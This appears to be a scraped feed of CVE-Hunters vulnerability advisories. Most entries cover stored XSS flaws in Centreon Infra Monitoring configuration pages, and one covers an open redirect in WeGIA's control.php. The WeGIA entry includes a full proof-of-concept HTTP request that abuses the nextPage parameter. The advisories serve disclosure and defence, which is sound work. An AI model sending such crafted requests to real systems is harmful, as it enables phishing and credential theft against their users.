<h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 18 Nov 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-54889/ https://www.cvehunters.com/p/cve-2025-54889/ <h2 id="cve-2025-54889-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-54889: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54889" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54889</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the SNMP traps manufacturer configuration page.</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (SNMP traps manufacturer configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p><h2 id="cve-2025-54889-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-54889: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54889" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54889</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the SNMP traps manufacturer configuration page.</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (SNMP traps manufacturer configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54889-centreon-web-all-versions-medium-severity-5123" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54889-centreon-web-all-versions-medium-severity-5123</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-54891/ https://www.cvehunters.com/p/cve-2025-54891/ <h2 id="cve-2025-54891-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-54891: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54891" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54891</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the ACL Resource Access configuration page.</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (ACL Resource access configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p><h2 id="cve-2025-54891-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-54891: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54891" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54891</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the ACL Resource Access configuration page.</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (ACL Resource access configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-54892/ https://www.cvehunters.com/p/cve-2025-54892/ <h2 id="cve-2025-54892-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-54892: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54892" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54892</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the SNMP traps group configuration page.</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (SNMP traps group configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p><h2 id="cve-2025-54892-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-54892: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54892" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54892</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the SNMP traps group configuration page.</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (SNMP traps group configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54892-centreon-web-all-versions-medium-severity-5121" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54892-centreon-web-all-versions-medium-severity-5121</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-54893/ https://www.cvehunters.com/p/cve-2025-54893/ <h2 id="cve-2025-54893-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-54893: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54893" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54893</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the Hosts templates configuration page</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Commands Connectors configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p><h2 id="cve-2025-54893-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-54893: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54893" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54893</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the Hosts templates configuration page</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Commands Connectors configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-62361/ https://www.cvehunters.com/p/cve-2025-62361/ <h2 id="cve-2025-62361-open-redirect-vulnerability-in-controlphp-endpoint-nextpage-parameter">CVE-2025-62361: Open Redirect Vulnerability in <code>control.php</code> endpoint <code>nextPage</code> parameter </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-62361" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-62361</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An Open Redirect vulnerability was identified in the <code>control.php</code> endpoint of the WeGIA application, specifically in the <code>nextPage</code> parameter (metodo=listarTodos nomeClasse=AlmoxarifeControle).</br></br>This vulnerability allows attackers to redirect users to arbitrary external domains, enabling phishing campaigns, malicious payload distribution, or user credential theft.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to validate and sanitize user input in the <code>nextPage</code> parameter.</br></br>As a result, attackers can craft malicious URLs that redirect users to external websites outside the trusted domain, undermining user trust and enabling social engineering attacks.</p><h2 id="cve-2025-62361-open-redirect-vulnerability-in-controlphp-endpoint-nextpage-parameter">CVE-2025-62361: Open Redirect Vulnerability in <code>control.php</code> endpoint <code>nextPage</code> parameter </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-62361" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-62361</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An Open Redirect vulnerability was identified in the <code>control.php</code> endpoint of the WeGIA application, specifically in the <code>nextPage</code> parameter (metodo=listarTodos nomeClasse=AlmoxarifeControle).</br></br>This vulnerability allows attackers to redirect users to arbitrary external domains, enabling phishing campaigns, malicious payload distribution, or user credential theft.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to validate and sanitize user input in the <code>nextPage</code> parameter.</br></br>As a result, attackers can craft malicious URLs that redirect users to external websites outside the trusted domain, undermining user trust and enabling social engineering attacks.</p> <p>Vulnerable Endpoint: <code>GET /WeGIA/controle/control.php?metodo=listarTodos&nomeClasse=AlmoxarifeControle&nextPage=</code></p> <p>Parameter: <code>nextPage</code></p> <h3 id="poc">PoC </h3><h4 id="request">Request: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /WeGIA/controle/control.php?metodo=listarTodos&nomeClasse=AlmoxarifeControle&nextPage=https%3A%2F%2Fgoogle.com HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/geral/editar_permissoes.php </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: {COOKIE} </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">The server accepts the crafted request and successfully redirects the victim to <code>https://google.com</code> instead of restricting navigation to the application’s own domain.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Phishing: Attackers can trick users into visiting malicious sites that mimic legitimate ones.</li> <li>Credential theft: Fake login pages can capture user credentials.</li> <li>Malware distribution: Victims may be redirected to websites hosting malicious software.</li> <li>Reputation damage: Users may lose trust in the Wegia platform if abused in phishing campaigns.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m99c-77f2-gpjx" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m99c-77f2-gpjx</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8429/ https://www.cvehunters.com/p/cve-2025-8429/ <h2 id="cve-2025-8429-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-8429: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8429" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8429</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the ACL Action access configuration page</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (ACL Action access configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p><h2 id="cve-2025-8429-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-8429: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8429" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8429</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the ACL Action access configuration page</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (ACL Action access configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8429-centreon-web-all-versions-medium-severity-5119" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8429-centreon-web-all-versions-medium-severity-5119</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8430/ https://www.cvehunters.com/p/cve-2025-8430/ <h2 id="cve-2025-8430-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-8430: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8430" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8430</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the Commands Connectors configuration configuration page.</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Commands Connectors configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p><h2 id="cve-2025-8430-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-8430: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8430" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8430</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the Commands Connectors configuration configuration page.</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Commands Connectors configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8430-centreon-web-all-versions-medium-severity-5118" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8430-centreon-web-all-versions-medium-severity-5118</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8459/ https://www.cvehunters.com/p/cve-2025-8459/ <h2 id="cve-2025-8459-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-8459: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8459" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8459</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with low privileges can inject XSS in the Monitoring Recurrent downtimes page.</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Monitoring recurrent downtime scheduler modules) allows Stored XSS.This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p><h2 id="cve-2025-8459-cross-site-scripting-xss-stored-in-centreon-infra-monitoring">CVE-2025-8459: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8459" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8459</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with low privileges can inject XSS in the Monitoring Recurrent downtimes page.</p> <h2 id="details">Details </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Monitoring recurrent downtime scheduler modules) allows Stored XSS.This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8459-centreon-web-all-versions-high-severity-5117" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8459-centreon-web-all-versions-high-severity-5117</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-11322/ https://www.cvehunters.com/p/cve-2025-11322/ <h2 id="cve-2025-11322-weak-password-policy-vulnerability-in-create-new-user-function">CVE-2025-11322: Weak Password 